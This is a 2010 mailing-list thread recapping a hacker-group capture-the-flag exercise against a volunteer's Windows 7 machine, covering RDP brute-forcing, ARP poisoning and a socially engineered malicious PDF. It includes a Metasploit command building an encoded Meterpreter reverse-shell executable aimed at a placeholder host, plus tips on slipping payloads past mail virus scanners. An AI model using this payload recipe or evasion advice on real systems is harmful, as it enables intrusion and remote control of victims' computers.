[Plug-security] HackFest - Review of Harold Wong's Presentation as a Windows 7 flag:

Lisa Kachold lisakachold at obnosis.com
Sat Oct 16 11:43:40 MST 2010


Hi Judd,

That was a very confusing email, I apologize (see below)

On Wed, Oct 13, 2010 at 1:42 PM, Judd Pickell <pickell at gmail.com> wrote:

> Sorry, but I am a bit confused. You were or were not able to run an exploit
> on his machine?


Negative,  none were able to exploit the Windows7 machine.  It was a "basic
out of the box build" according to Harold.  <So embarrassing for our small
but dedicated list of festers.....(names withheld to protect the innocent
:)   )

If you remember, Harold Wong is something of an "evangelist" promoting "good
source" over open or closed source, and especially educating people about
the needs for secure sources while debugging many of the myths upom which
sits M$ bashing.

See Wong's blog:  http://blogs.technet.com/b/haroldwong/

See one of Harold's video interviews on Exchange Server 2010:
http://www.youtube.com/watch?v=rpa9ARgjUBU

Harold Wong left open just two ports on his Windows 7, via wireless device
connection to Internet Untrusted Network (gangplank); the most significant
was RDP 3389.  Hydra was deployed to get the name and password, albeit
unsuccessfully.  Since Harold employs secure passwords (8 characters, truly
random with one shifted character and one number), our 3389 dictionary
attack was not going to be successful. Harold's son engaged in gaming from
the machine itself, under well engineered headphones, during the whole
adventure.

Most of the festers concentrated on port 3389, of course. * Port 2638 was
ignored*.

The port 2638 is used by* Sybase Adaptive Server Anywhere (ASA)* -- a
relational database management program developed and distributed by Sybase
that can be used as a standalone server, multi-user multi-client server or a
network server. The port 2638 is used for direct communication, data
sharing, and file transfer with desktop systems, workgroup computers and
other mobile environment. The port 2638 is most commonly used as an access
point for mobile phones and smart phones with a remote server. Symantec
Endpoint Protection also uses port 2638 as default. Our group did not
determine without a doubt which application was using this port.
Implementation of the *Symantec **Endpoint Protection Remote Console *requires
the user or installation process create a protocol definition for TCP port
2638 with ACL.   *None of our festers attempted to exploit that port.*

It was generally assumed (and hinted by me for all festers last month) that
*best possible attack vector for this exercise was layer 8 of the OSI model*-
* the human error layer or insecure computing*.  However, our festers spent
a great deal of time with XHydra and CAIN arp cache poisoning, RDP protocol
verification (patched for greater security historically and incorporated
into Windows7) ; they swiftly degenerated from a team approach to finding
other network devices of interest, trading lies and stealing candy from
Gangplankhq.com's generous TREAT bowls.

At 15:25 (25 minutes past the end of the exercise) I put together a quick
attachment exploit for Adobe, ensuring "through social engineering" it would
be opened, and creatively delivered it, having to deftly ensure delivery
past various virus checkers with the pdf intact.  *Unfortunately I had given
Harold Wong a great number of hints, such as dangerous Adobe pdf's
available, and I had hinted to others that pdf creation for custom reverse
shell was fun and trivial from within Metasploit (***See below).

*Therefore, Harold Wong was not using Adobe for reading such files and my
exploit fell on deaf ears, so to speak, bringing up a nasty pop-up error to
the user indicating that the pdf executed more than was expected.  *Granted
in a real world example, Adobe would be used, shipping by default.  NOTE
also, that the virus checking software did not at any time find my exploit
attachment and scrub it.  While any such exploit was QUICKLY discovered by
GOOGLE MAIL and quarantined, that Adobe attachment email exploit WAS SENT
HAPPILY THROUGH Microsoft's email servers directly to Harold Wong.  *   Of
course another fun item would be a GoToAssist cookie

GENERALLY, I take myself out of the flag capture events, since I end up
supporting the fest process.  The purpose of the event is training and fun
for the festers, not to watch Lisa take all the flags <grin> (there is NO
SUBSTITUTE for experience).

In a real world example, an attacker also would have properly attached an
RDP exploit (which was not even identified by Google's virus attachment
scrapers) which would have instantly provided us with FLAG JOY. For real fun

So, once again, Linux installed "out of the box" opening an insecure pdf
would create the same effect as Windows7.  Linux installed per defaults,
running on an untrusted network, with secure passwords and comparable
firewalling is equal, is it not?


HowTo Meterpreter//Metasploit PDF:


"output.exe" was either created from compiling a payload using template.c
in the Metasploit folder or by using the following CLI:
 Code:

msfpayload windows/meterpreter/reverse_tcp LHOST=A.B.C.D LPORT=8080 R | \
  msfencode -b '' -t exe -o meterpreter.exe

Here's what it does:
*Part 1*
1. msfpayload calls a payload, in this case meterpreter (reverse tcp).
2. LHOST (listening host) is set to A.B.C.D (IP-address, I think DNS
hostnames are supported too.)
3. LPORT (listening port) is set to 8080, set this to anything above 1024 if
you're on Linux since anything below requires root privileges.
4. R means RAW (pure unreadable binary machine-code).
5. | means pipe the output and \ is used because msfencode is on a new line.

*Part 2*
1. msfencode is used for encoding.
2. -b means bad characters, in this case there's none. (this is almost
always needed in real exploitation)
3. -t means type and since "exe" without quotes is written, the type is set
to exe of course.
4. -o means output, cause we need to send the output somewhere, in this
case: meterpreter.exe which could also be output.exe etc.

*Short explanation of the pipe progress:*
First msfpayload creates the payload by using an easily customizeable shell-
code with all the right ARGS (arguments) that you need, then it is sent to a
pipe which sends all the binary / RAW output to msfencode, which encodes
this and compiles this into a valid exe file.

*With msfencode it is also possible to use: *
-a (the architecture to use, irrelevant in this case)
-e (the encoder to use, f.ex. x86/shikata_gi_nai)

*With the -t switch it is possible to choose the following types:*
c, elf, exe, java, perl, raw, ruby and vba

Please use the: -h (help) switch or write --help or just "help" (without
quotes)
in Metasploit for further help since there is a lot of nice info when you
use that.

I also recommend that you read the nice documentation, it's really worth it.
You don't have to read the developer documentation, but I think some of it
was actually quite a nice read.

FREE ONLINE VERSION of METASPLOIT UNLEASHED:
http://www.offensive-security.com/metasploit-unleashed/

Of course, set up a virtual and unpatched Windows XP machine to play with as
well!

>
> Sincerely,
> Judd Pickell
>
> On Tue, Oct 12, 2010 at 7:11 PM, Lisa Kachold <lisakachold at obnosis.com>wrote:
>
>> We promised various people that we would be following up the a real blow
>> by blow of our exploit of Harold Wong's Windows 7 machine.
>>
>> It's published over on hackfest.obnosis.com under:
>>
>> Home <http://www.it-clowns.com/y/> » Flags Captured October 2<http://www.it-clowns.com/y/node/4>» CTF
>> - Microsoft Powershell <http://www.it-clowns.com/y/node/5>
>>
>>
>> <please register to share files, get updates and accept our "terms of
>> service".>
>>
>> Possible ways to attach Harold Wong's Windows 7:
>>
>> Network port attack vector:
>> Open ports:
>>
>> 3389
>>
>>  Using RDP we could do either a RDP MITM attack or a Hydra dictionary
>> attack to the listening service itself.
>>
>> Example RDP MITM:
>>
>> http://www.irongeek.com/i.php?page=videos/cain-rdp-terminal-server-mitm-...<http://www.irongeek.com/i.php?page=videos/cain-rdp-terminal-server-mitm-sniff>
>>
>> Should get RDP Windows7 via MITM if possible with loose encryption in a
>> real world situation where RDP traffic connections were working which we
>> could arp cache poison.
>>
>> Just having the port open we would have to do a hydra dictionary attack,
>> and Harold informed us that he used secure passwords.
>>
>> Therefore the only real attack vector we ever had open was social
>> engineering to get him to click on an exploit delivered via insecure file
>> sharing.
>>
>> Sending a Kaseya agent, liveperson cookie, or metasploit payload via pdf
>> in mail after getting assurance of his willingness to open it by asking him
>> to look at it attached to email.
>>
>> In the real world test Lisa Kachold delivered a pdf exploiting Adobe, but
>> since Harold Wong wisely doesn't use Adobe for his pdf's, it failed.
>>
>> No-one crafted nor delivered a RDP "package" for email delivery, which
>> would have worked best:
>> http://www.gnucitizen.org/blog/remote-desktop-command-fixation-attacks/
>>
>> Additionally, we might have to obfuscate, in a real world situation, code
>> in our pdf, or it will not be accepted as an attachment in Gmail. If Harold
>> Wong was using Microsoft Outlook directly to a MS based Mail Transport
>> Authority, we have a better chance of getting our PDF accepted, depending on
>> spam/virus protection.
>>
>> Harold Wong used a regular user desktop, without file sharing available,
>> configured for the "Internet Zone" without additional firewall or virus
>> checking add-ons.
>>
>> No flags were delivered by our team for Harold Wong.*
>> So, as heretic as it might seem, this completely debugs the myth that
>> "Microsoft 7 out of the box is more secure than Linux".
>>
>> hide everyone - here comes the fallout
>> --
>> Skype: 6022393392
>> Fax:     6233211450
>> ATT:     5037544452
>> Phoenix Linux Security Team <http://plug.phoenix.az.us/gangplank>
>>
>> http://www.it-clowns.com
>>
>> *"Great things are not done by impulse but a series of small things
>> brought together." -Van Gogh*
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>> ---------------------------------------------------
>> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
>> To subscribe, unsubscribe, or to change your mail settings:
>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>>
>
>
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>



-- 
Skype: 6022393392
Fax:     6233211450
ATT:     5037544452
Phoenix Linux Security Team <http://plug.phoenix.az.us/gangplank>

http://www.it-clowns.com

*"Great things are not done by impulse but a series of small things brought
together." -Van Gogh*


















-- 
Skype: 6022393392
Fax:     6233211450
ATT:     5037544452
Phoenix Linux Security Team <http://plug.phoenix.az.us/gangplank>

http://www.it-clowns.com

*"Great things are not done by impulse but a series of small things brought
together." -Van Gogh*
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.PLUG.phoenix.az.us/pipermail/plug-security/attachments/20101016/eb6d3326/attachment.html>


More information about the Plug-security mailing list